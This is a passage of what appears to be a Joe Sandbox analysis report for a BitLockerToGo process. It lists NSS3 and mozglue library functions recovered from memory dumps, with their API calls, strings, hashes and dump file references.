                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3d6b1fea2dd6dc25ef0b76bf0969ebfa7ffdffbdf610de3da17986c2ba611f9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7312575A01216ABD7009F6CDC4079A7778BF45318F18013AEA1967B50D730A9A4CBC1
                                                                                                                                                                                                                                                                                                                    Function 6CAFCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(?,6CAFCD93,?), ref: 6CAFCEEE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CAFCD93,?), ref: 6CAFCEFC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CAFCD93,?), ref: 6CAFCF0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAF08B4
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CAFCD93,?), ref: 6CAFCF1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAE8D2D,?,00000000,?), ref: 6CAEFB85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAEFBB1
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF47
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF67
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(?,00000000,6CAFCD93,?,?,?,?,?,?,?,?,?,?,?,6CAFCD93,?), ref: 6CAFCF78
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4291907967-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f4920e841b9c633c18a89d47c530b980ac7bb760655625f80e227dca45e88de5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E111C0A5E003045BFB20AA667D41BBBB5EC9F4814DF044039B929D7741FB71DA4E86A1
                                                                                                                                                                                                                                                                                                                    Function 6C9B84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B84F3
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B850A
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B851E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B855B
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B856F
                                                                                                                                                                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B85AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B767F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B7693
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B76A7
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9B85B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fba496d2d5824f33e913c89d6c2b8ee00ef864a96dafd4cc6b35b2ae0fae6bf3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 27c080f4916804f5934b1731a10b3886e6047451ac083826306b42afb566efeb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fba496d2d5824f33e913c89d6c2b8ee00ef864a96dafd4cc6b35b2ae0fae6bf3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49219F74200602AFDB18DF24D888A5BB7B9AF4830DF24482DE55B93B41DB71F949CB55
                                                                                                                                                                                                                                                                                                                    Function 6CAA8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAA8C1B
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 6CAA8C34
                                                                                                                                                                                                                                                                                                                    • PL_ArenaAllocate.NSS3 ref: 6CAA8C65
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA8C9C
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAA8CB6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                                                    • String ID: KRAM
                                                                                                                                                                                                                                                                                                                    • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0ec8a79058a583bdd9221a3d1acb30272cd23d5b0922f037e90cab7dcb5eca1f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 131131d1bbc41ba5319393f8923cdc4f16d5c06799b56010764dde1fbce3900d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec8a79058a583bdd9221a3d1acb30272cd23d5b0922f037e90cab7dcb5eca1f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81219FB1A056519FD700AFB9C484569FBF4FF05304F05896AD8888B701EB35D8CACF82
                                                                                                                                                                                                                                                                                                                    Function 6C9BF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: GetCurrentProcess.KERNEL32(?,6C9731A7), ref: 6C9ACBF1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9731A7), ref: 6C9ACBFA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BF619
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9BF598), ref: 6C9BF621
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9B94EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9B9508
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BF637
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8,?,?,00000000,?,6C9BF598), ref: 6C9BF645
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8,?,?,00000000,?,6C9BF598), ref: 6C9BF663
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9BF62A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                                    • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d5e99b6335be0ca5e5938cb839708c847a87e388955d7ff819c5b0f69201ae8b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d2d90e8387830f8e07ff8a8de2d036f68367697581e79d2d0d81e98a919f014
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e99b6335be0ca5e5938cb839708c847a87e388955d7ff819c5b0f69201ae8b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E11E779215205FBDB04AF58E9489A677BDFF9635CB200015EA1593F01CB72E821CBA1
                                                                                                                                                                                                                                                                                                                    Function 6CBA2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_EnterMonitor.NSS3 ref: 6CBA2CA0
                                                                                                                                                                                                                                                                                                                    • PR_ExitMonitor.NSS3 ref: 6CBA2CBE
                                                                                                                                                                                                                                                                                                                    • calloc.MOZGLUE(00000001,00000014), ref: 6CBA2CD1
                                                                                                                                                                                                                                                                                                                    • strdup.MOZGLUE(?), ref: 6CBA2CE1
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CBA2D27
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Loaded library %s (static lib), xrefs: 6CBA2D22
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                                                                    • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                                                                    • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4cc7ee4d16f412c2df3e4de241e82ae79f99e877987e1cd41a0a4e21e0fa4df
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9a09d6f250a5ec468009de6095d586b37a4e8689ce7f1a065278a6d37418047c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4cc7ee4d16f412c2df3e4de241e82ae79f99e877987e1cd41a0a4e21e0fa4df
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91108B5605290AFEB008F66E844A6A77B4EB4531DF08843DD85DC7B41E731D849CBA3
                                                                                                                                                                                                                                                                                                                    Function 6C9B05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C9ACFAE,?,?,?,6C9731A7), ref: 6C9B05FB
                                                                                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C9ACFAE,?,?,?,6C9731A7), ref: 6C9B0616
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9731A7), ref: 6C9B061C
                                                                                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9731A7), ref: 6C9B0627
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 325b404f78acc21caa98b213e5675cf81ac4f497423f0f75ecbe74a2cd92528a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7844444a59932de2b5884e9c994a6715db79140094284863444f6376008a74d1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325b404f78acc21caa98b213e5675cf81ac4f497423f0f75ecbe74a2cd92528a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3E08CE2A0101037F614225ABC86DBB7A1CDBEA134F08003AFD0D82702E94AED1A51F6
                                                                                                                                                                                                                                                                                                                    Function 6CAFED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CAFED6B
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CAFEDCE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,6CAFB04F), ref: 6CAFEE46
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAFEECA
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAFEEEA
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CAFEEFB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f6f3b77fcb316ead307241371bbbc16fa61ca5d98f640f2a7d6ba61ab6c27bb6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 46523f9e71bdd3726be41f4f66b2d4f2a9ada53d03b48e76c1a22b44b842bdbd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6f3b77fcb316ead307241371bbbc16fa61ca5d98f640f2a7d6ba61ab6c27bb6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B817EB1A002059FEB14CF59DD80AAB77F5BF88308F18442CF92597B51D735E89ACBA1
                                                                                                                                                                                                                                                                                                                    Function 6C9805F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5baf0287c6a583390b7f06330dcb65d4005bfe7d0f822ab0e1688d77449573c2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f09d60afd858a369af3236c87643b800b459f68f935c9e7a02cdf1bf1d2cfca
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5baf0287c6a583390b7f06330dcb65d4005bfe7d0f822ab0e1688d77449573c2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A15AB0A06705CFDB14CF29C994A99FBF5BF48304F548AAED45A97B00E730A995CF90
                                                                                                                                                                                                                                                                                                                    Function 6C9D14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
